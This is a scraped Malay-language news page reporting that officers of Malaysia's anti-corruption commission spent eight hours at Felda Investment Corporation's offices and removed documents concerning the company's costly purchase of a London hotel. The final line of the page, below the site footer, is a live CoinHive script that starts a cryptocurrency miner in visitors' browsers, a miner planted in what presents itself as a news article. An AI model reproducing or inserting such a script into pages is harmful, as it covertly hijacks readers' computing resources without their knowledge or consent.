© Copyright 2017, All Rights Reserved
Home / Semasa / Lapan jam SPRM ‘punggah’ FIC

Lapan jam SPRM ‘punggah’ FIC

Kuala Lumpur: Selepas lapan jam berada Balai Felda, Jalan Gurney, pegawai dan anggota Suruhanjaya Pencegahan Rasuah Malaysia (SPRM) akhirnya membawa keluar dokumen daripada Felda Investment Corporation (FIC) bagi membantu siasatan.

Mereka yang tiba kira-kira jam 10.20 pagi hari ini dipercayai untuk mengambil dokumen berkaitan siasatan terhadap pembelian hotel empat bintang di Kensington, London.

Semua dokumen berkenaan dibawa keluar lapan pegawai SPRM daripada tingkat empat sebelum meninggalkan Balai Felda dengan menaiki dua kenderaan SPRM kira-kira jam 5.45 petang tadi.

Difahamkan semua dokumen yang terdiri daripada tiga kotak dan dua bagasi itu sudah menjalani proses siasatan awal sebelum ia dibawa keluar untuk dibawa ke Putrajaya.

Timbalan Ketua Pesuruhjaya (Operasi) SPRM Datuk Azam Baki akan mengeluarkan kenyataan rasmi berhubung proses pengambilan dokumen itu dalam masa terdekat.

Sementara itu, FIC dalam satu kenyataan mengesahkan kehadiran lapan pegawai SPRM ke pejabat FIC untuk menyiasat pembelian hotel terbabit.

Katanya, FIC memberikan kerjasama penuh sepanjang proses siasatan oleh pihak SPRM.

“FIC komited memberikan sokongan terhadap usaha pihak berkaitan dalam meningkatkan ketelusan, akauntabiliti, integriti serta amalan etika perniagaan yang menjadi kunci kepada tadbir urus korporat yang baik,” katanya.

Terdahulu Ketua Pesuruhjaya SPRM, Datuk Dzulkifli Ahmad dilaporkan berkata, berdasarkan siasatan awal, FIC dipercayai membeli hotel itu pada harga jauh lebih tinggi berbanding harga asal hingga menyebabkan FIC mengalami kerugian jutaan ringgit.

Katanya, siasatan terperinci akan dijalankan bagi mengenal pasti sama ada wujud unsur rasuah dan salah guna kuasa dalam proses pembelian hotel itu.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Para KL2017: Tewas tetapi Amir tidak cemburu | Olahraga

KUALA LUMPUR: Kehadiran permata baharu dalam acara lompat jauh lelaki T38 (cerebral ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();